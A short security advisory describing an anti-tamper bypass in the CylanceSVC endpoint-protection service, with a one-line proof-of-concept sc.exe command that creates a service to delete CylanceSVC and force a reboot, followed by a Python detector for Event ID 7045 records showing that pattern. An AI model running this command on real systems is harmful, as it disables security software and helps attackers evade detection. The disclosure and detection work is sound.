CylanceSVC Anti-Tamper Bypass

CylanceSVC suffers from an anti-tamper bypass vulnerability.


MD5 | 1c03266d4c2cfc883d1e8a70facc1117

The CylanceSVC service is not sufficiently protected: its anti-tamper
protection can be bypassed by creating a service that deletes the
CylanceSVC service.

##POC##

C:\>sc.exe create CyKiller binpath= "C:\Windows\System32\sc.exe delete CylanceSVC" && sc.exe start CyKiller && shutdown /t 0 /r /f

##POC##
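An added detection example, not part of the original advisory: it scans Service Control Manager "service installed" records (Event ID 7045) for a new service whose binary path is an sc.exe delete aimed at CylanceSVC. The function names, the dict layout and the sample records are assumptions constructed for illustration.

```python
# Added example: flag Event ID 7045 records whose new service runs "sc.exe delete <protected>".
PROTECTED = {"cylancesvc"}   # service names to guard, lower-cased
TAMPER_VERBS = {"delete"}    # sc.exe verbs treated as tampering


def tokens(command_line):
    """Lower-case and split a command line; quotes are dropped so quoted paths still split."""
    return command_line.replace('"', " ").lower().split()


def tamper_target(image_path):
    """Return the protected service named after an sc.exe tamper verb, or None."""
    toks = tokens(image_path)
    for i, tok in enumerate(toks):
        exe = tok.replace("/", "\\").rsplit("\\", 1)[-1]
        if exe not in ("sc", "sc.exe"):
            continue
        rest = toks[i + 1:]
        if rest and rest[0].startswith("\\\\"):   # optional \\server argument
            rest = rest[1:]
        if len(rest) >= 2 and rest[0] in TAMPER_VERBS and rest[1] in PROTECTED:
            return rest[1]
    return None


def scan(events):
    """Return (ServiceName, target) for each 7045 record that tampers with a protected service."""
    hits = []
    for e in events:
        if e.get("EventID") != 7045:
            continue
        target = tamper_target(e.get("ImagePath", ""))
        if target:
            hits.append((e["ServiceName"], target))
    return hits


# Constructed sample records (field names follow the 7045 event data; values are made up,
# except the first ImagePath, which is the binpath from the PoC above).
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "CyKiller",
     "ImagePath": r"C:\Windows\System32\sc.exe delete CylanceSVC"},
    {"EventID": 7045, "ServiceName": "ExampleAgent",
     "ImagePath": r'"C:\Program Files\ExampleVendor\agent.exe" --service'},
    {"EventID": 7036, "ServiceName": "ExampleAgent"},
]

if __name__ == "__main__":
    for name, target in scan(SAMPLE_EVENTS):
        print(f"ALERT: service {name!r} installed with a binary path that deletes {target}")
```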
